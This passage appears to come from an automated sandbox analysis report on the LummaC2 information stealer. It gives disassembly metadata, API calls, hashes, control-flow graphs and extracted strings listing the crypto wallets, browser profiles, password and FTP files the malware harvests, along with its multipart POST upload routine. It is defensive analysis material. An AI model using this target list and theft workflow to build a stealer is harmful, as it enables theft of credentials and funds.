kehpmmoa576xedbgpcpmigafmmnjhl$ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc$ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo
                                                            • API String ID: 4038537762-1377293222
                                                            • Opcode ID: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
                                                            • Instruction ID: d3b4c8d05487b98e51841e16d8283d2e4e5c243acd67d22c1ca68150be5d60ea
                                                            • Opcode Fuzzy Hash: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
                                                            • Instruction Fuzzy Hash: 05E229F2E001065AEF2896588D8357F7969EB14304F25453FF80AF63D1EA3C8E558A9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $jRk$%appd576xedata%\El576xedectrum\wal576xedlets$%appd576xedata%\Ethe576xedreum$%appd576xedata%\Op576xedera Softw576xedare\Op576xedera GX Sta576xedble$%appd576xedata%\Ope576xedra Soft576xedware\Op576xedera Sta576xedble$%appda576xedta%\Bina576xednce$%appda576xedta%\Mo576xedzilla\Fir576xedefox\Prof576xediles$%appda576xedta%\Op576xedera Softwa576xedre\Op576xedera Neo576xedn\Us576xeder Da576xedta$%appdata%\AnyDesk$%appdata%\Authy Desktop\Local Storage\leveldb$%appdata%\Bitcoin\wallets$%appdata%\Electrum\wallets$%appdata%\Exodus\exodus.wallet$%appdata%\FileZilla$%appdata%\Ledger Live$%appdata%\Telegram Desktop$%appdata%\atomic\Local Storage\leveldb$%appdata%\com.liberty.jaxx\IndexedDB$%lo576xedcalapp576xeddata%\Go576xedogle\Chr576xedome\Us576xeder Dat576xeda$%loc576xedalappda576xedta%\Kom576xedeta\Us576xeder Da576xedta$%locala576xedppdata%\Mic576xedrosoft\Edge\Us576xeder Data$%localappdata%\BraveSoftware\Brave-Browser\User Data$%localappdata%\Chro576xedmium\Use576xedr Data$%localappdata%\CocCoc\Browser\User Data$%localappdata%\Coinomi\Coinomi\wallets$%localappdata%\Comodo\Dragon\User Data$%programfiles%\Steam$%programfiles%\Steam\config$%userpro576xedfile%$%userprofile%$*.576xedtxt$*.conf$*.kbdx$*.leveldb$*576xed$.fin576xedger-pr576xedint.fp$?$@an($Aan($Aan($Applications/AnyDesk$Applications/FileZilla$Applications/KeePass$Applications/Steam$Applications/Steam/config$Applications/Telegram$Brave Software$Chr576xedome$Chromi576xedum$CocCoc$Comodo$Ed576xedge$Import576xedant File576xeds/Pro576xedfile$Kom576xedeta$Mozi576xedlla Firef576xedox$Op576xedera G576xedX Stab576xedle$Op576xedera Neo576xedn$Op576xedera Sta576xedble$ST4$TT4$TT4$Wal576xedlets/Bi576xednance$Wal576xedlets/Bin576xedance$Wall576xedets/Binan576xedce$Wall576xedets/Ele576xedctrum$Wall576xedets/Eth576xedereum$Wallets/Atomic$Wallets/Authy Desktop$Wallets/Bitcoin core$Wallets/Coinomi$Wallets/Electrum$Wallets/Exodus$Wallets/JAXX New Version$Wallets/Ledger Live$ap576xedp-sto576xedre.js576xedon$keyst576xedore$q7 C$recentservers.xml$sim576xedple-sto576xedrage.j576xedson$sitemanager.xml$ssfn*$y_B>
                                                            • API String ID: 0-3008219856
                                                            • Opcode ID: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
                                                            • Instruction ID: b823253c8ecb5ad27e2b287cb1dce7157abede6b904688f5b513f038bfe6f5bb
                                                            • Opcode Fuzzy Hash: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
                                                            • Instruction Fuzzy Hash: 71C207B1F002299BCF249B9AED4297E7970AB14300FE4453BE015FB391E67D89518B9F
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen$CallbackDevicesDispatcherDisplayEnumUser
                                                            • String ID: Ver$$jRk$%s (%d.%d.%d)$- CP576xedU Name: $- HW576xedID: $- Phys576xedical Ins576xedtalled Memor576xedy: $- Screen Resoluton: $4jn`$4jn`$Aan($C: $GhYuIq$LID(Lu576xedmma ID): $Lum576xedmaC2, Build 20233101$Syste576xedm.txt$TT4$advapi32.dll$kernel32.dll$n._$n: $o._$o._$p7 C$q7 C$sion$user32.dll$x_B>$y_B>$y_B>
                                                            • API String ID: 3760342818-3740799521
                                                            • Opcode ID: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
                                                            • Instruction ID: 1dd07344ff1857ff55ac4e32df16f8dea444b4f0229405df86b90c0a9d587245
                                                            • Opcode Fuzzy Hash: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
                                                            • Instruction Fuzzy Hash: 710304B1504B419BDB349F29C88162BB7E0EB59310F24E92FE09BDB751D678E841CB1B
                                                            APIs
                                                            • lstrcmpW.KERNEL32(?,0045FD9A), ref: 0040C3B1
                                                            • lstrcatW.KERNEL32(?,?), ref: 0040C427
                                                            • lstrcatW.KERNEL32(?,0045E148), ref: 0040C431
                                                            • lstrlenW.KERNEL32(?), ref: 0040C581
                                                            • lstrcmpW.KERNEL32(?,0045FD96), ref: 0040C8D4
                                                            • lstrlenW.KERNEL32(00001A2F), ref: 0040C901
                                                            • lstrlenW.KERNEL32(00001A2F), ref: 0040D826
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$lstrcatlstrcmp
                                                            • String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$LOCK$Y[[T$\??\$bi$kernel32.dll$ntdll.dll${#9${#9$Y=`$Y=`
                                                            • API String ID: 156957741-3266097529
                                                            • Opcode ID: 586842b40f5e22ce16161be6ee07f9eaddf4cb437a7acc71fa442095b329c1f4
                                                            • Instruction ID: 88d54f90e21775ceda28cbcef53f0ea71a711b7076ec2cdd820ba9bac023bc57
                                                            • Opcode Fuzzy Hash: 586842b40f5e22ce16161be6ee07f9eaddf4cb437a7acc71fa442095b329c1f4
                                                            • Instruction Fuzzy Hash: 3CF2D4B2D002198BDF249F9888856BEB674EF54700F24453BE516FB3E0D7788A458B9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "w$ "w$EeS$EeS$EeS$JI3i$KI3i$KI3i$VL6T$VL6T$_m.Q$_m.Q$eo>w$fo>w$fo>w$mNA/
                                                            • API String ID: 0-3469262258
                                                            • Opcode ID: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
                                                            • Instruction ID: 53dd30e2529ea33158ec6446975a809713fb297dce848eb7333cd10e9ac2b658
                                                            • Opcode Fuzzy Hash: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
                                                            • Instruction Fuzzy Hash: 8303F8B1E101298BCF28DB58D9856BEB7B5AB24300F64052FD415EB360D378CD868B9F
                                                            APIs
                                                            • lstrcatW.KERNEL32(?,C0E8A4B4), ref: 0040E55B
                                                            • lstrcatW.KERNEL32(?,0045E102), ref: 0040E565
                                                            • lstrcatW.KERNEL32(?,00000000), ref: 0040E7C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: !t8$"t8$"t8$(lu$)lu$)lu$Ied|$Ied|$Pz#$Pz#$kernel32.dll$n_v$n_v$u2B$v2B$v2B
                                                            • API String ID: 4038537762-116603239
                                                            • Opcode ID: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
                                                            • Instruction ID: 6ea63d0937669649ebb299a5b80ec071dd59a3ad312de0dc3acd440ddf73d718
                                                            • Opcode Fuzzy Hash: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
                                                            • Instruction Fuzzy Hash: C7E2ECB1D001199BDF248B99C9456BEBA71BB14304F24093BE506FF3D1D3798A92CB9B
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45
                                                            • GetProcessHeap.KERNEL32 ref: 004314B2
                                                            • HeapAlloc.KERNEL32(?,00000008,00000028), ref: 004314EB
                                                            • GetDIBits.GDI32(?,00000001,00000000,?,?,00000001,00000000), ref: 004321FA
                                                            • ReleaseDC.USER32(00000000,?), ref: 00432204
                                                            • GetProcessHeap.KERNEL32 ref: 004326F0
                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 004326FF
                                                            • GetProcessHeap.KERNEL32 ref: 00432701
                                                            • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00432708
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$Process$Free$AllocAllocateBitsRelease
                                                            • String ID: $jRk$?$TT4$TT4$q7 C$q7 C$y_B>$y_B>
                                                            • API String ID: 2023195035-2600574631
                                                            • Opcode ID: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
                                                            • Instruction ID: 86873c67e1170f8f17d23c3501641da2f07f81d3ce14e24acfbd45c3e0a97cea
                                                            • Opcode Fuzzy Hash: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
                                                            • Instruction Fuzzy Hash: 1FC2D771E001198BDF28CF98C9926BEB6B0AF5C314F24252BD515EB360D7789E41CB9B
                                                            APIs
                                                            • wsprintfW.USER32 ref: 004346DB
                                                            • RegEnumKeyExW.KERNELBASE(?,?,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00434725
                                                            • RegCloseKey.KERNELBASE(?), ref: 0043475B
                                                            • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,?,00000001), ref: 00434DA5
                                                            • RegCloseKey.ADVAPI32(?,00000001), ref: 00434F17
                                                            • RegCloseKey.ADVAPI32(?,00000001), ref: 00434F76
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$EnumOpenwsprintf
                                                            • String ID: $jRk$$jRk$%s%s$%s\%s$?$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$Software.txt$TT4$TT4$y_B>$y_B>
                                                            • API String ID: 44529101-205855365
                                                            • Opcode ID: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
                                                            • Instruction ID: 3b7421bd9f904e401ff100dd7efef49cd6fe7be7401ce4d7a99a7b86551d2639
                                                            • Opcode Fuzzy Hash: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
                                                            • Instruction Fuzzy Hash: E2621D70E002198BDF28CB9899455FEB674BF9C318F242517E625EB360D73CAD418B9B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: %appdata%\The Bat!$%localappdata%\The Bat!$(lu$)lu$*.ABD$*.EML$*.FLX$*.HBI$*.MSB$*.MSG$*.TBB$*.TBK$*.TBN$*.mbox$*.txt$Mail Clients\The Bat\AppData$Mail Clients\The Bat\Local$kernel32.dll$n_v$n_v
                                                            • API String ID: 4038537762-373908387
                                                            • Opcode ID: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
                                                            • Instruction ID: 4f92dd08cf156959b88a3ca31d79465b6333db6cd064390b28fe5485dbf8b601
                                                            • Opcode Fuzzy Hash: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
                                                            • Instruction Fuzzy Hash: 7042D7F1E0012A9BCF149A55AC5667F7B74EB51304FA8052BE405FA3A1E338CA5187DF

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4850 405aaa-405ac0 4851 405ac3 4850->4851 4852 405ac9-405ad1 4851->4852 4853 405ad3-405ad8 4852->4853 4854 405b3c-405b41 4852->4854 4855 405ade-405ae3 4853->4855 4856 405b7f-405b84 4853->4856 4857 405b43-405b48 4854->4857 4858 405bbb-405bc0 4854->4858 4861 405ae9-405aee 4855->4861 4862 405bfd-405c02 4855->4862 4859 405c54-405c59 4856->4859 4860 405b8a-405b8f 4856->4860 4865 405c2e-405c33 4857->4865 4866 405b4e-405b53 4857->4866 4863 405ca3-405ca8 4858->4863 4864 405bc6-405bcb 4858->4864 4871 405e3d-405e42 4859->4871 4872 405c5f-405c64 4859->4872 4869 405d74-405d79 4860->4869 4870 405b95-405b9a 4860->4870 4873 405af4-405af9 4861->4873 4874 405ce5-405cea 4861->4874 4879 405dc6-405dcb 4862->4879 4880 405c08-405c0d 4862->4880 4877 405e71-405e76 4863->4877 4878 405cae-405cb3 4863->4878 4875 405bd1-405bd6 4864->4875 4876 405dab-405db0 4864->4876 4867 405e15-405e1a 4865->4867 4868 405c39-405c3e 4865->4868 4881 405d22-405d27 4866->4881 4882 405b59-405b5e 4866->4882 4903 405e20-405e25 4867->4903 4904 4060e6 4867->4904 4901 405c44-405c49 4868->4901 4902 406018-406027 lstrcatW 4868->4902 4891 406091-40609d 4869->4891 4892 405d7f-405d84 4869->4892 4887 405fa0-405fc8 call 404988 4870->4887 4888 405ba0-405ba5 4870->4888 4909 405e48-405e4d 4871->4909 4910 4060fe-406109 4871->4910 4905 405c6a-405c6f 4872->4905 4906 40615f-406166 call 447047 4872->4906 4907 405ebc-405ee8 lstrcatW call 4360e1 lstrcatW * 2 4873->4907 4908 405aff-405b04 4873->4908 4885 405cf0-405cf5 4874->4885 4886 406059-406070 4874->4886 4893 405bdc-405be1 4875->4893 4894 405fcd-405fda 4875->4894 4895 4060a2-4060b3 4876->4895 4896 405db6-405dbb 4876->4896 4911 405e7c-405e81 4877->4911 4912 40617d-406197 call 4052a1 4877->4912 4913 405cb9-405cbe 4878->4913 4914 40602c-40604e 4878->4914 4899 405dd1-405dd6 4879->4899 4900 4060c3-4060dd 4879->4900 4897 405c13-405c18 4880->4897 4898 405fdf-406009 4880->4898 4889 406077-40608c 4881->4889 4890 405d2d-405d32 4881->4890 4883 405b64-405b69 4882->4883 4884 405f1c-405f5c call 404edc call 4048e2 4882->4884 4916 405f6c-405f90 call 403600 4883->4916 4917 405b6f-405b74 4883->4917 4935 406157-40615a 4884->4935 4984 405f62-405f67 4884->4984 4885->4852 4937 405cfb-405d13 call 403e03 4885->4937 4932 406072 4886->4932 4933 4060df-4060e4 4886->4933 4887->4852 4919 405bab-405bb0 4888->4919 4920 40612e-406150 4888->4920 4889->4852 4890->4852 4940 405d38-405d64 4890->4940 4891->4852 4892->4852 4941 405d8a-405d9b 4892->4941 4893->4852 4922 405be7-405bf8 lstrcatW 4893->4922 4894->4852 4895->4935 4936 4060b9-4060be 4895->4936 4944 405dc1 4896->4944 4945 406115-406129 4896->4945 4897->4852 4923 405c1e-405c29 4897->4923 4927 406010-406013 4898->4927 4928 40600b 4898->4928 4899->4852 4946 405ddc-405e05 4899->4946 4900->4933 4900->4935 4925 40619c-4061d6 call 4038d5 call 403a1c 4901->4925 4926 405c4f 4901->4926 4902->4852 4903->4852 4947 405e2b-405e38 4903->4947 4938 4060e7 4904->4938 4905->4852 4929 405c75-405c93 call 403600 4905->4929 4964 40616b-406178 4906->4964 4907->4852 4948 405b0a-405b0f 4908->4948 4949 405eed-405f17 lstrcatW call 4360e1 lstrcatW * 2 4908->4949 4909->4852 4950 405e53-405e5a call 447047 4909->4950 4910->4920 4939 40610b-406113 4910->4939 4911->4852 4915 405e87-405eac 4911->4915 4912->4852 4913->4852 4934 405cc4-405ce0 4913->4934 4930 406152 4914->4930 4931 406054 4914->4931 4915->4935 4951 405eb2-405eb7 4915->4951 4916->4935 4980 405f96-405f9b 4916->4980 4952 405d16-405d1d 4917->4952 4953 405b7a 4917->4953 4919->4852 4956 405bb6-40620a call 4360e1 call 40e14e 4919->4956 4920->4930 4920->4935 4922->4852 4923->4852 4987 4061d8 4925->4987 4988 4061dd-4061e0 4925->4988 4926->4852 4927->4852 4928->4927 4929->4935 4981 405c99-405c9e 4929->4981 4930->4935 4931->4935 4932->4935 4933->4935 4934->4852 4935->4852 4936->4935 4937->4952 4938->4938 4939->4906 4939->4945 4940->4927 4962 405d6a-405d6f 4940->4962 4941->4935 4963 405da1-405da6 4941->4963 4944->4852 4945->4852 4946->4927 4967 405e0b-405e10 4946->4967 4947->4852 4948->4852 4968 405b11-405b31 4948->4968 4949->4852 4978 405e5f-405e6c 4950->4978 4951->4935 4952->4852 4953->4852 4962->4927 4963->4935 4964->4852 4967->4927 4968->4933 4977 405b37 4968->4977 4977->4935 4978->4852 4980->4935 4981->4935 4984->4935 4987->4988 4988->4851
                                                            APIs
                                                            • lstrcatW.KERNEL32(?,0045E102,?,?,00000000,?,?,004058C6), ref: 00405BEF
                                                            • lstrcatW.KERNEL32(00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405EC4
                                                            • lstrcatW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405ED7
                                                            • lstrcatW.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EDF
                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EF3
                                                            • lstrcatW.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405F06
                                                            • lstrcatW.KERNEL32(?,84D55917,?,?,?,?,00000000,?,?,004058C6), ref: 00405F0E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: *576xed$,$/Ext576xedensio576xedns/$\Loc576xedal Extens576xedion Settin576xedgs\$n_v$n_v
                                                            • API String ID: 4038537762-1578839816
                                                            • Opcode ID: c0ae44d74d2992532015a5b165d06f1b6e1b0c53f96b55d44899152aba16d5ae
                                                            • Instruction ID: e5bf92a8c3e4632e865b489cc3d7c979cf6fee557c11a145fed96966642f9e4d
                                                            • Opcode Fuzzy Hash: c0ae44d74d2992532015a5b165d06f1b6e1b0c53f96b55d44899152aba16d5ae
                                                            • Instruction Fuzzy Hash: 5FF1F9B1D006198BCF28DB98889657FBA74EB44300F25463BE506FA3D1D73C9A518F9B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 9a%^$9a%^$9a%^$9a%^$Content-Type: multipart/form-data; boundary=%s$L%$M%$M%$POST$SqDe87817huf871793q74$TeslaBrowser/5.5$winhttp.dll
                                                            • API String ID: 0-485045143
                                                            • Opcode ID: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
                                                            • Instruction ID: c94fe321a93857c184b0378d7fc968df2dfc5883700fbc77eb7b7d771d47b6e9
                                                            • Opcode Fuzzy Hash: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
                                                            • Instruction Fuzzy Hash: 73521DB1E802058BDF288EE89CC56FE7AA1AB58304F24052BE515E6390D77CCDC1979F

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 5373 40620b-406227 5374 40622d-406235 5373->5374 5375 406237-40623c 5374->5375 5376 40627e-406283 5374->5376 5377 406242-406247 5375->5377 5378 4062ef-4062f4 5375->5378 5379 406289-40628e 5376->5379 5380 40633e-406343 5376->5380 5383 4063e7-4063ec 5377->5383 5384 40624d-406252 5377->5384 5381 406431-406436 5378->5381 5382 4062fa-4062ff 5378->5382 5387 406294-406299 5379->5387 5388 40639b-4063a0 5379->5388 5385 406462-406467 5380->5385 5386 406349-40634e 5380->5386 5401 406615-40661a 5381->5401 5402 40643c-406441 5381->5402 5393 406305-40630a 5382->5393 5394 406596-40659b 5382->5394 5397 4065e1-4065e6 5383->5397 5398 4063f2-4063f7 5383->5398 5395 406543-406548 5384->5395 5396 406258-40625d 5384->5396 5389 40664c-406651 5385->5389 5390 40646d-406472 5385->5390 5399 406354-406359 5386->5399 5400 40648f-406494 5386->5400 5403 4064df-4064e4 5387->5403 5404 40629f-4062a4 5387->5404 5391 406521-406526 5388->5391 5392 4063a6-4063ab 5388->5392 5417 406845-40686e 5389->5417 5418 406657-40665c 5389->5418 5409 406478-40647d 5390->5409 5410 40668f-4066a9 5390->5410 5423 406683-40668a 5391->5423 5424 40652c-406531 5391->5424 5425 4063b1-4063b6 5392->5425 5426 4067b2-4067d4 5392->5426 5413 406310-406315 5393->5413 5414 4064c4-4064c7 5393->5414 5433 406750-406762 call 447a80 5394->5433 5434 4065a1-4065a6 5394->5434 5427 40671a-406740 5395->5427 5428 40654e-406553 5395->5428 5429 406263-406268 5396->5429 5430 4067e4-4067fd call 447047 5396->5430 5405 406767-40676e 5397->5405 5406 4065ec-4065f1 5397->5406 5431 406802-40680d lstrcatW call 40b7bb 5398->5431 5432 4063fd-406402 5398->5432 5419 4066f7-406715 5399->5419 5420 40635f-406364 5399->5420 5415 40649a-40649f 5400->5415 5416 4066ae-4066d0 5400->5416 5411 406620-406625 5401->5411 5412 406773-406784 lstrcatW 5401->5412 5435 406825-406840 call 419e6b 5402->5435 5436 406447-40644c 5402->5436 5421 4066e0-4066f2 call 447a80 5403->5421 5422 4064ea-4064ef 5403->5422 5407 406789-4067ad call 404822 5404->5407 5408 4062aa-4062af 5404->5408 5405->5374 5406->5374 5437 4065f7-406610 call 447047 5406->5437 5407->5374 5438 4068b5-4068bc 5408->5438 5439 4062b5-4062ba 5408->5439 5462 406483-40648a 5409->5462 5463 40695b-406960 5409->5463 5410->5374 5411->5374 5440 40662b-40663c 5411->5440 5412->5374 5441 4068f5-406913 5413->5441 5442 40631b-406320 5413->5442 5468 4064c8 5414->5468 5415->5374 5465 4064a5-4064b0 5415->5465 5445 4066d6-4066db 5416->5445 5446 40691a-40691d 5416->5446 5466 406870 5417->5466 5467 406875-406878 5417->5467 5443 406662-40667e lstrcatW * 2 5418->5443 5444 406968-40696d 5418->5444 5419->5374 5447 40636a-40636f 5420->5447 5448 40687d-4068ac call 404a00 5420->5448 5421->5374 5422->5374 5469 4064f5-40651a 5422->5469 5423->5374 5424->5374 5470 406537-40653e 5424->5470 5451 4068c1-4068c7 5425->5451 5452 4063bc-4063c1 5425->5452 5426->5446 5457 4067da-4067df 5426->5457 5427->5446 5450 406746-40674b 5427->5450 5428->5374 5471 406559-406586 call 403ac1 call 404f5e 5428->5471 5472 4068d9-4068ec call 403c98 5429->5472 5473 40626e-406273 5429->5473 5430->5374 5488 406812-40681c 5431->5488 5455 406922-406943 lstrcatW * 2 5432->5455 5456 406408-40640d 5432->5456 5433->5374 5434->5374 5474 4065ac-4065d1 5434->5474 5435->5374 5459 406452-406457 5436->5459 5460 406948-406956 5436->5460 5437->5374 5438->5374 5439->5374 5476 4062c0-4062e4 5439->5476 5440->5446 5477 406642-406647 5440->5477 5441->5446 5496 406915 5441->5496 5442->5374 5478 406326-406339 5442->5478 5443->5374 5444->5374 5500 406973-406991 call 404c9c 5444->5500 5445->5446 5446->5374 5447->5374 5479 406375-406387 call 40b129 5447->5479 5448->5446 5512 4068ae-4068b3 5448->5512 5450->5446 5486 4068cd-4068d4 5451->5486 5452->5374 5481 4063c7-4063d7 5452->5481 5455->5374 5456->5374 5484 406413-40642c lstrcatW * 2 5456->5484 5457->5446 5459->5486 5487 40645d 5459->5487 5460->5374 5462->5374 5463->5374 5498 406966 5463->5498 5465->5474 5490 4064b6-4064be 5465->5490 5466->5467 5467->5374 5468->5468 5492 40658c-406591 5469->5492 5493 40651c 5469->5493 5470->5374 5471->5446 5471->5492 5472->5446 5513 4068ee-4068f3 5472->5513 5473->5374 5497 406275-40627c 5473->5497 5474->5446 5499 4065d7-4065dc 5474->5499 5503 4062ea 5476->5503 5504 4063dd-4063e2 5476->5504 5477->5446 5478->5374 5511 40638c-406396 5479->5511 5481->5446 5481->5504 5484->5374 5486->5374 5487->5374 5488->5467 5506 40681e-406823 5488->5506 5490->5414 5490->5423 5492->5446 5493->5446 5496->5446 5497->5374 5510 406996-4069a0 5498->5510 5499->5446 5500->5510 5503->5446 5504->5446 5506->5467 5511->5374 5512->5446 5513->5446
                                                            APIs
                                                            • lstrcatW.KERNEL32(?,0045E102), ref: 0040641B
                                                            • lstrcatW.KERNEL32(?,?), ref: 00406423
                                                            • lstrcatW.KERNEL32(?,?), ref: 0040692A
                                                            • lstrcatW.KERNEL32(?,0045E102), ref: 00406934
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: Ku^%$Ku^%$Y=`$Y=`
                                                            • API String ID: 4038537762-3617128223
                                                            • Opcode ID: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
                                                            • Instruction ID: 9c9fa2152e9cc94146e123e662ad7e189f6101f2fbba187f29f17e96b34d8480
                                                            • Opcode Fuzzy Hash: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
                                                            • Instruction Fuzzy Hash: 72F11AB1D0010A9BCF249E9898815BE7A70AB54304F264D3BE517FA3E4D37CCD619B5B

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 5516 42b9c5-42b9ce 5517 42b9d5-42b9dd 5516->5517 5518 42ba34-42ba39 5517->5518 5519 42b9df-42b9e4 5517->5519 5522 42bb28-42bb2d 5518->5522 5523 42ba3f-42ba44 5518->5523 5520 42bad0-42bad5 5519->5520 5521 42b9ea-42b9ef 5519->5521 5528 42badb-42bae0 5520->5528 5529 42bbcf-42bbd4 5520->5529 5526 42b9f5-42b9fa 5521->5526 5527 42bb59-42bb5e 5521->5527 5524 42bb33-42bb38 5522->5524 5525 42bc20-42bc25 5522->5525 5530 42ba4a-42ba4f 5523->5530 5531 42bb9c-42bba1 5523->5531 5534 42bb3e-42bb43 5524->5534 5535 42bd0d-42bd12 5524->5535 5538 42bc2b-42bc30 5525->5538 5539 42bdff-42be04 5525->5539 5536 42ba00-42ba05 5526->5536 5537 42bc6c-42bc71 5526->5537 5540 42bd40-42bd45 5527->5540 5541 42bb64-42bb69 5527->5541 5542 42bae6-42baeb 5528->5542 5543 42bcdd-42bce2 5528->5543 5532 42bdba-42bdbf 5529->5532 5533 42bbda-42bbdf 5529->5533 5546 42ba55-42ba5a 5530->5546 5547 42bcab-42bcb0 5530->5547 5544 42bba7-42bbac 5531->5544 5545 42bd6e-42bd73 5531->5545 5570 42bdc5-42bdca 5532->5570 5571 42c038-42c043 5532->5571 5568 42bbe5-42bbea 5533->5568 5569 42c05e-42c084 5533->5569 5550 42bed5-42bef9 5534->5550 5551 42bb49-42bb4e 5534->5551 5556 42bd18-42bd1d 5535->5556 5557 42bfed-42c009 5535->5557 5554 42be21-42be81 call 40e14e * 4 5536->5554 5555 42ba0b-42ba10 5536->5555 